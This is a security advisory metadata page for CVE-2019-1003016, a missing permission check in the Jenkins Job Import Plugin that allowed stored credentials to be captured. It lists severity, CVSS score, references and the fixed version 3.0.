Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS01N3d3LTJjdnItd3YzOM4AAQ7G
Jenkins Job Import Plugin vulnerable to exposure of sensitive information
Jenkins Job Import Plugin did not check user permissions on its API endpoint used to access remote Jenkins instances. This allowed users with Overall/Read access to Jenkins to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.
Job Import Plugin 3.0 will only access Jenkins instances using credentials defined in the global configuration.
Permalink: https://github.com/advisories/GHSA-57ww-2cvr-wv38JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01N3d3LTJjdnItd3YzOM4AAQ7G
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Moderate
Classification: General
Published: about 2 years ago
Updated: 7 months ago
CVSS Score: 4.3
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
Identifiers: GHSA-57ww-2cvr-wv38, CVE-2019-1003016
References:
- https://nvd.nist.gov/vuln/detail/CVE-2019-1003016
- https://jenkins.io/security/advisory/2019-01-28/#SECURITY-905%20(2)
- https://github.com/advisories/GHSA-57ww-2cvr-wv38
Affected Packages
maven:org.jenkins-ci.plugins:job-import-plugin
Affected Version Ranges: <= 2.1Fixed in: 3.0